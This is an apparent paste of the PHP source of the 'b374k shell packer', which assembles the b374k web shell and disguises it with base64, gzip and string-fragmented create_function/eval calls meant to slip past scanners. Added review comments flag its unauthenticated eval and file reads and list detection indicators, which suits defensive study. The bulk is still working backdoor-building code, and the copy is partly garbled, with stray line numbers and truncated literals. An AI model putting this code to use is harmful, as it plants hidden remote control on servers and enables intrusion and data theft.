Ribang

Be7ak shell

Apr 14th, 2017
<?php
/*
b374k shell
Jayalah Indonesiaku
(c)2014
https://github.com/b374k/b374k
*/
// Packer configuration. It lives in $GLOBALS['packer'] because the helper
// functions defined at the bottom of this file read it from there.
// The banner text above is also written into every generated file by
// packer_b374k(), after the optional strip step, so it survives packing and is
// a usable static indicator for an unmodified build.
$GLOBALS['packer']['title'] = "b374k shell packer";
$GLOBALS['packer']['version'] = "0.4.2";
$GLOBALS['packer']['base_dir'] = "./base/";
$GLOBALS['packer']['module_dir'] = "./module/";
$GLOBALS['packer']['theme_dir'] = "./theme/";
// packer_get_module() passes every module_dir/*.php file through eval() (see
// packer_check_module), so merely loading this script executes those files.
$GLOBALS['packer']['module'] = packer_get_module();
$GLOBALS['packer']['theme'] = packer_get_theme();
require $GLOBALS['packer']['base_dir'].'jsPacker.php';
/* PHP FILES START */
// $base_code and $module_code accumulate the PHP source that ends up in the shell.
$base_code = "";
$base_code .= packer_read_file($GLOBALS['packer']['base_dir']."resources.php");
$base_code .= packer_read_file($GLOBALS['packer']['base_dir']."main.php");
$module_code = packer_read_file($GLOBALS['packer']['base_dir']."base.php");
/* PHP FILES END */
/* JAVASCRIPT AND CSS FILES START */
$zepto_code = packer_read_file($GLOBALS['packer']['base_dir']."zepto.js");
$js_main_code = "\n\n".packer_read_file($GLOBALS['packer']['base_dir']."main.js");
$js_code = "\n\n".packer_read_file($GLOBALS['packer']['base_dir']."sortable.js").$js_main_code;
$js_code .= "\n\n".packer_read_file($GLOBALS['packer']['base_dir']."base.js");
// NOTE(review): the cookie value is joined into a file path without being
// checked against the list from packer_get_theme(); the command-line branch
// further down does validate the theme with in_array() before using it.
if(isset($_COOKIE['packer_theme'])) $theme = $_COOKIE['packer_theme'];
else $theme ="default";
$css_code = packer_read_file($GLOBALS['packer']['theme_dir'].$theme.".css");
/* JAVASCRIPT AND CSS FILES END */
// layout
$layout = packer_read_file($GLOBALS['packer']['base_dir']."layout.php");
// Every POST value is URL-decoded once more here, on top of PHP's own decoding.
$p = array_map("rawurldecode", packer_get_post());
// Entry point. REMOTE_ADDR is set, so this branch handles requests that carry
// a client address (the browser UI and its HTTP calls); the final else branch
// is the command-line packer.
// NOTE(review): nothing in this file authenticates the HTTP caller, yet the
// branches below read files and evaluate PHP on request. A reachable copy of
// this packer is a finding in its own right, independent of any file it built.
if(isset($_SERVER['REMOTE_ADDR'])){
    if(isset($p['read_file'])){
        // POST read_file: returns the HTML-escaped contents of the named file.
        // The path is used as given; it is not limited to the packer directories.
        $file = $p['read_file'];
        if(is_file($file)){
            packer_output(packer_html_safe(packer_read_file($file)));
        }
        // Only reached when is_file() fails, because packer_output() ends the request.
        packer_output('error');
    }
    elseif(isset($_GET['run'])){
        // GET run: assembles the shell in memory and executes it with eval()
        // instead of writing it to disk.
        if(empty($_GET['run'])) $modules = array();
        else $modules = explode("," ,$_GET['run']);
        $module_arr = array_merge(array("explorer", "terminal", "eval"), $modules);
        // Module names come from the query string and are only wrapped in double
        // quotes (no escaping) before being placed in the evaluated source.
        $module_arr = array_map("packer_wrap_with_quote", $module_arr);
        $module_init = "\n\$GLOBALS['module_to_load'] = array(".implode(", ", $module_arr).");";
        foreach($modules as $module){
            $module = trim($module);
            $filename = $GLOBALS['packer']['module_dir'].$module;
            if(is_file($filename.".php")) $module_code .= packer_read_file($filename.".php");
            if(is_file($filename.".js")) $js_code .= "\n".packer_read_file($filename.".js")."\n";
        }
        $layout = str_replace("<__CSS__>", $css_code, $layout);
        $layout = str_replace("<__ZEPTO__>", $zepto_code, $layout);
        $layout = str_replace("<__JS__>", $js_code, $layout);
        $content = trim($module_init)."?>".$base_code.$module_code.$layout;
        eval($content);
        die();
    }
    elseif(isset($p['outputfile'])&&isset($p['password'])&&isset($p['module'])&&isset($p['strip'])&&isset($p['base64'])&&isset($p['compress'])&&isset($p['compress_level'])){
        // POST with all seven fields: build the packed file on disk and reply with
        // a status line and the escaped source, separated by the {[|b374k|]} marker.
        $outputfile = trim($p['outputfile']);
        if(empty($outputfile)) $outputfile = 'b374k.php';
        $password = trim($p['password']);
        $modules = trim($p['module']);
        if(empty($modules)) $modules = array();
        else $modules = explode("," ,$modules);
        $strip = trim($p['strip']);
        $base64 = trim($p['base64']);
        // Unlike the command-line branch, the compression name is not checked
        // against the supported list here; packer_b374k() ignores unknown values.
        $compress = trim($p['compress']);
        $compress_level = (int) $p['compress_level'];
        $module_arr = array_merge(array("explorer", "terminal", "eval"), $modules);
        $module_arr = array_map("packer_wrap_with_quote", $module_arr);
        $module_init = "\n\$GLOBALS['module_to_load'] = array(".implode(", ", $module_arr).");";
        foreach($modules as $module){
            $module = trim($module);
            $filename = $GLOBALS['packer']['module_dir'].$module;
            if(is_file($filename.".php")) $module_code .= packer_read_file($filename.".php");
            if(is_file($filename.".js")) $js_code .= "\n".packer_read_file($filename.".js")."\n";
        }
        $layout = str_replace("<__CSS__>", $css_code, $layout);
        $layout = str_replace("<__ZEPTO__>", $zepto_code, $layout);

        if($strip=='yes') $js_code = packer_pack_js($js_code);
        $layout = str_replace("<__JS__>", $js_code, $layout);
        $htmlcode = trim($layout);
        $phpcode = "<?php ".trim($module_init)."?>".trim($base_code).trim($module_code);
        packer_output(packer_b374k($outputfile, $phpcode, $htmlcode, $strip, $base64, $compress, $compress_level, $password));
    }
    else{

        // No recognised parameters: render the packer form. Theme names come from
        // the *.css file names found by packer_get_theme() and are written into
        // the markup as they are.
        $available_themes = "<tr><td>Theme</td><td><select class='theme' style='width:150px;'>";
        foreach($GLOBALS['packer']['theme'] as $k){
            if($k==$theme) $available_themes .= "<option selected='selected'>".$k."</option>";
            else $available_themes .= "<option>".$k."</option>";
        }
        $available_themes .= "</select></td></tr>";
?><!doctype html>
<html>
<head>
<title><?php echo $GLOBALS['packer']['title']." ".$GLOBALS['packer']['version'];?></title>
<meta charset='utf-8'>
<meta name='robots' content='noindex, nofollow, noarchive'>
<style type="text/css">
<?php echo $css_code;?>
#devTitle{
font-size:18px;
text-align:center;
font-weight:bold;
}
</style>
</head>
<body>

<div id='wrapper' style='padding:12px'>
<div id='devTitle' class='border'><?php echo $GLOBALS['packer']['title']." ".$GLOBALS['packer']['version'];?></div>
<br>
<table class='boxtbl'>
<tr><th colspan='2'><p class='boxtitle'>Quick Run</p></th></tr>
<tr><td style='width:220px;'>Module (separated by comma)</td><td><input type='text' id='module' value='<?php echo implode(",", $GLOBALS['packer']['module']);?>'></td></tr>
<?php echo $available_themes; ?>
<tr><td colspan='2'>
<form method='get' id='runForm' target='_blank'><input type='hidden' id='module_to_run' name='run' value='>
<span class='button' id='runGo'>Run</span>
</form>
</td></tr>
</table>
<br>
<table class='boxtbl'>
<tr><th colspan='2'><p class='boxtitle'>Pack</p></th></tr>
<tr><td style='width:220px;'>Output</td><td><input id='outputfile' type='text' value='b374k.php'></td></tr>
<tr><td>Password</td><td><input id='password' type='text' value='b374k'></td></tr>
<tr><td>Module (separated by comma)</td><td><input type='text' id='module_to_pack' value='<?php echo implode(",", $GLOBALS['packer']['module']);?>'></td></tr>
<?php echo $available_themes; ?>
<tr><td>Strip Comments and Whitespaces</td><td>
<select id='strip' style='width:150px;'>
<option selected="selected">yes</option>
<option>no</option>
</select>
</td></tr>

<tr><td>Base64 Encode</td><td>
<select id='base64' style='width:150px;'>
<option selected="selected">yes</option>
<option>no</option>
</select>
</td></tr>

<tr id='compress_row'><td>Compress</td><td>
<select id='compress' style='width:150px;'>
<option>no</option>
<option selected="selected">gzdeflate</option>
<option>gzencode</option>
<option>gzcompress</option>
</select>
<select id='compress_level' style='width:150px;'>
<option>1</option>
<option>2</option>
<option>3</option>
<option>4</option>
<option>5</option>
<option>6</option>
<option>7</option>
<option>8</option>
<option selected="selected">9</option>
</select>
</td></tr>

<tr><td colspan='2'>
<span class='button' id='packGo'>Pack</span>
</td></tr>
<tr><td colspan='2' id='result'></td></tr>
<tr><td colspan='2'><textarea id='resultContent'></textarea></td></tr>
</table>
</div>

<script type='text/javascript'>
var init_shell = false;
<?php echo $zepto_code;?>
<?php echo $js_main_code;?>
var targeturl = '<?php echo packer_get_self(); ?>';
var debug = false;
Zepto(function($){
refresh_row();
$('#runGo').on('click', function(e){
module = $('#module').val();
$('#module_to_run').val(module);
$('#runForm').submit();
});
$('#base64').on('change', function(e){
refresh_row();
});
$('#packGo').on('click', function(e){
outputfile = $('#outputfile').val();
password = $('#password').val();
module = $('#module_to_pack').val();
strip = $('#strip').val();
base64 = $('#base64').val();
compress = $('#compress').val();
compress_level = $('#compress_level').val();
send_post({outputfile:outputfile, password:password, module:module, strip:strip, base64:base64, compress:compress, compress_level:compress_level}, function(res){
splits = res.split('{[|b374k|]}');
$('#resultContent').html(splits[1]);
$('#result').html(splits[0]);
});
});

$('.theme').on('change', function(e){
$('.theme').val($(this).val());
set_cookie('packer_theme', $('.theme').val());
location.href = targeturl;
});
});
function refresh_row(){
base64 = $('#base64').val();
if(base64=='yes'){
$('#compress_row').show();
}
else{
$('#compress_row').hide();
$('#compress').val('no');
}
}
</script>
</body>
</html><?php
    }
}
else{
    // Command-line mode: parse options, validate them, build the file and print a
    // plain-text report. This branch validates more than the HTTP branch does
    // (theme list, compression name, compression level).
    $output = $GLOBALS['packer']['title']." ".$GLOBALS['packer']['version']."\n\n";
    if(count($argv)<=1){
        // No arguments: print usage only.
        $output .= "options :\n";
        $output .= "\t-o filename\t\t\t\tsave as filename\n";
        $output .= "\t-p password\t\t\t\tprotect with password\n";
        $output .= "\t-t theme\t\t\t\ttheme to use\n";
        $output .= "\t-m modules\t\t\t\tmodules to pack separated by comma\n";
        $output .= "\t-s\t\t\t\t\tstrip comments and whitespaces\n";
        $output .= "\t-b\t\t\t\t\tencode with base64\n";
        $output .= "\t-z [no|gzdeflate|gzencode|gzcompress]\tcompression (use only with -b)\n";
        $output .= "\t-c [0-9]\t\t\t\tlevel of compression\n";
        $output .= "\t-l\t\t\t\t\tlist available modules\n";
        $output .= "\t-k\t\t\t\t\tlist available themes\n";
    }
    else{
        $opt = getopt("o:p:t:m:sbz:c:lk");
        if(isset($opt['l'])){
            $output .= "available modules : ".implode(",", $GLOBALS['packer']['module'])."\n\n";
            echo $output;
            die();
        }

        if(isset($opt['k'])){
            $output .= "available themes : ".implode(",", $GLOBALS['packer']['theme'])."\n\n";
            echo $output;
            die();
        }
        // NOTE(review): the string literal in the next condition looks truncated in
        // this copy (probably an empty string lost when the paste was extracted).
        if(isset($opt['o'])&&(trim($opt['o'])!=')){
            $outputfile = trim($opt['o']);
        }
        else{
            $output .= "error : no filename given (use -o filename)\n\n";
            echo $output;
            die();
        }
        // An absent -p leaves the password empty, in which case packer_b374k()
        // writes no password line into the generated file at all.
        $password = isset($opt['p'])? trim($opt['p']):"";
        $theme = isset($opt['t'])? trim($opt['t']):"default";
        // The theme must be one of the names discovered on disk.
        if(!in_array($theme, $GLOBALS['packer']['theme'])){
            $output .= "error : unknown theme file\n\n";
            echo $output;
            die();
        }
        $css_code = packer_read_file($GLOBALS['packer']['theme_dir'].$theme.".css");

        $modules = isset($opt['m'])? trim($opt['m']):implode(",", $GLOBALS['packer']['module']);
        if(empty($modules)) $modules = array();
        else $modules = explode("," ,$modules);
        $strip = isset($opt['s'])? "yes":"no";
        $base64 = isset($opt['b'])? "yes":"no";
        $compress = isset($opt['z'])? trim($opt['z']):"no";
        if(($compress!='gzdeflate')&&($compress!='gzencode')&&($compress!='gzcompress')&&($compress!='no')){
            $output .= "error : unknown options -z ".$compress."\n\n";
            echo $output;
            die();
        }
        else{
            // Compression is only accepted together with base64 encoding.
            if(($base64=='no')&&($compress!='no')){
                $output .= "error : use -z options only with -b\n\n";
                echo $output;
                die();
            }
        }
        $compress_level = isset($opt['c'])? trim($opt['c']):"";
        // NOTE(review): empty("0") is true, so "-c 0" is replaced by 9 here even
        // though the usage text and the pattern below both allow 0.
        if(empty($compress_level)) $compress_level = '9';
        if(!preg_match("/^[0-9]{1}$/", $compress_level)){
            $output .= "error : unknown options -c ".$compress_level." (use only 0-9)\n\n";
            echo $output;
            die();
        }
        $compress_level = (int) $compress_level;
        // The report echoes the chosen password in clear text to the terminal.
        $output .= "Filename\t\t: ".$outputfile."\n";
        $output .= "Password\t\t: ".$password."\n";
        $output .= "Theme\t\t\t: ".$theme."\n";
        $output .= "Modules\t\t\t: ".implode(",",$modules)."\n";
        $output .= "Strip\t\t\t: ".$strip."\n";
        $output .= "Base64\t\t\t: ".$base64."\n";
        if($base64=='yes') $output .= "Compression\t\t: ".$compress."\n";
        if($base64=='yes') $output .= "Compression level\t: ".$compress_level."\n";
        $module_arr = array_merge(array("explorer", "terminal", "eval"), $modules);
        $module_arr = array_map("packer_wrap_with_quote", $module_arr);
        $module_init = "\n\$GLOBALS['module_to_load'] = array(".implode(", ", $module_arr).");";
        foreach($modules as $module){
            $module = trim($module);
            $filename = $GLOBALS['packer']['module_dir'].$module;
            if(is_file($filename.".php")) $module_code .= packer_read_file($filename.".php");
            if(is_file($filename.".js")) $js_code .= "\n".packer_read_file($filename.".js")."\n";
        }
        $layout = str_replace("<__CSS__>", $css_code, $layout);
        $layout = str_replace("<__ZEPTO__>", $zepto_code, $layout);

        if($strip=='yes') $js_code = packer_pack_js($js_code);
        $layout = str_replace("<__JS__>", $js_code, $layout);
        $htmlcode = trim($layout);
        $phpcode = "<?php ".trim($module_init)."?>".trim($base_code).trim($module_code);
        $res = packer_b374k($outputfile, $phpcode, $htmlcode, $strip, $base64, $compress, $compress_level, $password);
        // packer_b374k() returns "status{[|b374k|]}source"; only the status part,
        // with its HTML removed, is shown on the command line.
        $status = explode("{[|b374k|]}", $res);
        $output .= "Result\t\t\t: ".strip_tags($status[0])."\n\n";
    }
    echo $output;
}
  330. function packer_read_file($file){
  331. $content = false;
  332. if($fh = @fopen($file, "rb")){
  333. $content = "";
  334. while(!feof($fh)){
  335. $content .= fread($fh, 8192);
  336. }
  337. }
  338. return $content;
  339. }
/**
 * Write $content to $file and, when the ZipArchive class is available, also
 * create "<file>.zip" containing it.
 *
 * The companion archive means a packed file is normally accompanied by a
 * same-named .zip in the same directory, which is worth looking for when
 * triaging a host where this packer has run.
 *
 * @param string $file    Output path.
 * @param string $content Bytes to write.
 * @return bool True when the file was written (and the archive created, if
 *              attempted); false when opening, writing or archiving failed.
 */
function packer_write_file($file, $content){
    // NOTE(review): the handle opened here is never closed in this function.
    if($fh = @fopen($file, "wb")){
        if(fwrite($fh, $content)!==false){
            // Without the zip extension the plain file alone counts as success.
            if(!class_exists("ZipArchive")) return true;

            // Replace any archive left over from an earlier run.
            if(file_exists($file.".zip")) unlink ($file.".zip");
            $zip = new ZipArchive();
            // NOTE(review): "./" is prepended here but not in the unlink() above,
            // so the two paths only agree when $file is a relative path.
            $filename = "./".$file.".zip";
            if($zip->open($filename, ZipArchive::CREATE)!==TRUE) return false;
            $zip->addFile($file);
            $zip->close();
            return true;
        }
    }
    return false;
}
  356. function packer_get_post(){
  357. return packer_fix_magic_quote($_POST);
  358. }
  359. function packer_fix_magic_quote($arr){
  360. $quotes_sybase = strtolower(ini_get('magic_quotes_sybase'));
  361. if(function_exists('get_magic_quotes_gpc') && get_magic_quotes_gpc()){
  362. if(is_array($arr)){
  363. foreach($arr as $k=>$v){
  364. if(is_array($v)) $arr[$k] = clean($v);
  365. else $arr[$k] = (empty($quotes_sybase) || $quotes_sybase === 'off')? stripslashes($v) : stripslashes(str_replace("\'\'", "\'", $v));
  366. }
  367. }
  368. }
  369. return $arr;
  370. }
  371. function packer_html_safe($str){
  372. return htmlspecialchars($str, 2 | 1);
  373. }
  374. function packer_wrap_with_quote($str){
  375. return "\"".$str."\"";
  376. }
  377. function packer_output($str){
  378. header("Content-Type: text/plain");
  379. header("Cache-Control: no-cache");
  380. header("Pragma: no-cache");
  381. echo $str;
  382. die();
  383. }
  384. function packer_get_self(){
  385. $query = (isset($_SERVER["QUERY_STRING"])&&(!empty($_SERVER["QUERY_STRING"])))?"?".$_SERVER["QUERY_STRING"]:"";
  386. return packer_html_safe($_SERVER["REQUEST_URI"].$query);
  387. }
/**
 * Remove comments from PHP source and collapse runs of whitespace.
 *
 * The source is tokenised with token_get_all(); comment tokens are dropped and
 * all other tokens are concatenated back together. Afterwards every run of two
 * or more whitespace characters in the joined text becomes a single space.
 *
 * @param string $str PHP source code.
 * @return string The source without comments and with whitespace collapsed.
 */
function packer_strips($str){
    // NOTE(review): the literal on the next line looks truncated in this copy
    // (probably an empty string lost when the paste was extracted).
    $newStr = ';
    $commentTokens = array(T_COMMENT);
    // Token constants differ between PHP versions, hence the defined() guards.
    if(defined('T_DOC_COMMENT')) $commentTokens[] = T_DOC_COMMENT;
    if(defined('T_ML_COMMENT')) $commentTokens[] = T_ML_COMMENT;
    $tokens = token_get_all($str);
    foreach($tokens as $token){
        // Array tokens are (id, text, line); plain strings are single characters.
        if (is_array($token)) {
            if (in_array($token[0], $commentTokens)) continue;
            $token = $token[1];
        }
        $newStr .= $token;
    }
    // Applied to the whole joined text, so whitespace runs inside string
    // literals are collapsed as well.
    $newStr = preg_replace("/(\s{2,})/", " ", $newStr);
    return $newStr;
}
  404. function packer_get_theme(){
  405. $available_themes = array();
  406. foreach(glob($GLOBALS['packer']['theme_dir']."*.css") as $filename){
  407. $filename = basename($filename, ".css");
  408. $available_themes[] = $filename;
  409. }
  410. return $available_themes;
  411. }
  412. function packer_get_module(){
  413. $available_modules = array();
  414. foreach(glob($GLOBALS['packer']['module_dir']."*.php") as $filename){
  415. $filename = basename($filename, ".php");
  416. if(packer_check_module($filename)) $available_modules[] = $filename;
  417. }
  418. return $available_modules;
  419. }
/**
 * Decide whether a module file declares itself under its own file name.
 *
 * The module's PHP file is read and executed with eval(); it is accepted when
 * that leaves $GLOBALS['module'][$module]['id'] equal to $module.
 *
 * NOTE(review): packer_get_module() calls this for every "*.php" file in the
 * module directory, so any file placed there runs with the packer's
 * privileges as soon as the packer is loaded, whether or not it is later
 * selected for packing.
 *
 * @param string $module Module base name (no directory, no extension).
 * @return bool True when the file exists and registers a matching id.
 */
function packer_check_module($module){
    $filename = $GLOBALS['packer']['module_dir'].$module;
    if(is_file($filename.".php")){
        $content = packer_read_file($filename.".php");
        // The @ hides warnings and notices raised while the module code runs.
        @eval("?>".$content);
        // NOTE(review): reads the key without isset(); a file that does not
        // register itself presumably raises an undefined-index notice here.
        if($GLOBALS['module'][$module]['id']==$module) return true;
    }
    return false;
}
  429. function packer_pack_js($str){
  430. $packer = new JavaScriptPacker($str, 0, true, false);
  431. return $packer->pack();
  432. }
/**
 * Assemble the final file from PHP and HTML parts, optionally strip, compress
 * and base64-encode it, write it to disk and report the result.
 *
 * Traits of the generated file that are visible in this function and useful
 * for detection and triage:
 *  - a fixed banner comment (project name, slogan, year, project URL) is
 *    prepended after stripping, so it is present in every unmodified build;
 *  - the access password is stored as an unsalted sha1(md5(password)) in
 *    $GLOBALS['pass'], followed by the literal comment "sha1(md5(pass))";
 *  - in the base64 form the decoder, create_function and eval names are
 *    emitted as concatenated string fragments, so a plain keyword search for
 *    those function names misses them; match on the fragment pattern or on
 *    normalised source instead;
 *  - the base64 form relies on create_function(), which PHP 8.0 removed;
 *  - the output file is given mode 0777.
 *
 * @param string     $output         Path of the file to create.
 * @param string     $phpcode        PHP part of the payload.
 * @param string     $htmlcode       HTML/JS/CSS part of the payload.
 * @param string     $strip          'yes' to strip comments and whitespace.
 * @param string     $base64         'yes' to base64-encode the payload.
 * @param string     $compress       'gzdeflate', 'gzencode', 'gzcompress', or anything else for none.
 * @param int|string $compress_level Compression level; clamped to 0..9.
 * @param string     $password       Clear-text password, or empty for none.
 * @return string Status text and the HTML-escaped generated source, separated
 *                by the marker "{[|b374k|]}"; the second part is empty on error.
 */
function packer_b374k($output, $phpcode, $htmlcode, $strip, $base64, $compress, $compress_level, $password){
    $content = "";
    if(is_file($output)){
        if(!is_writable($output)) return "error : file ".$output." exists and is not writable{[|b374k|]}";
    }
    // From here on $password holds a line of PHP source (or stays empty), not the password itself.
    if(!empty($password)) $password = "\$GLOBALS['pass'] = \"".sha1(md5($password))."\"; // sha1(md5(pass))\n";
    $compress_level = (int) $compress_level;
    if($compress_level<0) $compress_level = 0;
    elseif($compress_level>9) $compress_level = 9;
    // The version shown in the banner is taken from a $GLOBALS['ver'] assignment
    // found in the PHP part, if there is one.
    $version = "";
    if(preg_match("/\\\$GLOBALS\['ver'\]\ *=\ *[\"']+([^\"']+)[\"']+/", $phpcode, $r)){
        $version = $r[1];
    }

    $header = "<?php
/*
b374k shell ".$version."
Jayalah Indonesiaku
(c)".@date("Y",time())."
https://github.com/b374k/b374k
*/\n";
    if($strip=='yes'){
        $phpcode = packer_strips($phpcode);
        // Minify the HTML part: drop indentation, blank lines, tabs and carriage
        // returns, then remove newlines around braces.
        $htmlcode = preg_replace("/(\ {2,}|\n{2,}|\t+)/", "", $htmlcode);
        $htmlcode = preg_replace("/\r/", "", $htmlcode);
        $htmlcode = preg_replace("/}\n+/", "}", $htmlcode);
        $htmlcode = preg_replace("/\n+}/", "}", $htmlcode);
        $htmlcode = preg_replace("/\n+{/", "{", $htmlcode);
        $htmlcode = preg_replace("/\n+/", "\n", $htmlcode);
    }
    $content = $phpcode.$htmlcode;
    // $encoder_func is the name of the matching decompression function, written
    // as quoted fragments that only form the name once the generated file runs.
    if($compress=='gzdeflate'){
        $content = gzdeflate($content, $compress_level);
        $encoder_func = "gz'.'in'.'fla'.'te";
    }
    elseif($compress=='gzencode'){
        $content = gzencode($content, $compress_level);
        $encoder_func = "gz'.'de'.'co'.'de";
    }
    elseif($compress=='gzcompress'){
        $content = gzcompress($content, $compress_level);
        $encoder_func = "gz'.'un'.'com'.'pre'.'ss";
    }
    else{
        $encoder_func = "";
    }
    if($base64=='yes'){
        $content = base64_encode($content);
        if($compress!='no'){
            $encoder = $encoder_func."(ba'.'se'.'64'.'_de'.'co'.'de(\$x))";
        }
        else{
            $encoder = "ba'.'se'.'64'.'_de'.'co'.'de(\"\$x\")";
        }
        // Generated stub: banner, optional password line, then a dynamically
        // created function that decodes the embedded blob and evaluates it.
        $code = $header.$password."\$func=\"cr\".\"eat\".\"e_fun\".\"cti\".\"on\";\$b374k=\$func('\$x','ev'.'al'.'(\"?>\".".$encoder.");');\$b374k(\"".$content."\");?>";
    }
    else{
        if($compress!='no'){
            // NOTE(review): this branch sets $encoder but never assigns $code, so the
            // write below receives an undefined variable. The command-line caller
            // rejects compression without base64; the HTTP caller does not.
            $encoder = $encoder_func."(\$x)";
        }
        else{
            // Plain form: banner, password line and payload, with adjacent
            // close/open PHP tag pairs merged away.
            $code = $header.$password."?>".$content;
            $code = preg_replace("/\?>\s*<\?php\s*/", "", $code);
        }
    }
    if(is_file($output)) unlink($output);
    if(packer_write_file($output, $code)){
        // World-readable, -writable and -executable: a PHP file with this mode
        // under a web root is itself worth alerting on.
        chmod($output, 0777);
        // NOTE(review): $output is placed in the link markup unescaped; only the
        // generated source after the marker goes through packer_html_safe().
        return "Succeeded : <a href='".$output."' target='_blank'>[ ".$output." ] Filesize : ".filesize($output)."</a>{[|b374k|]}".packer_html_safe(trim($code));
    }
    return "error{[|b374k|]}";
}
  505. ?>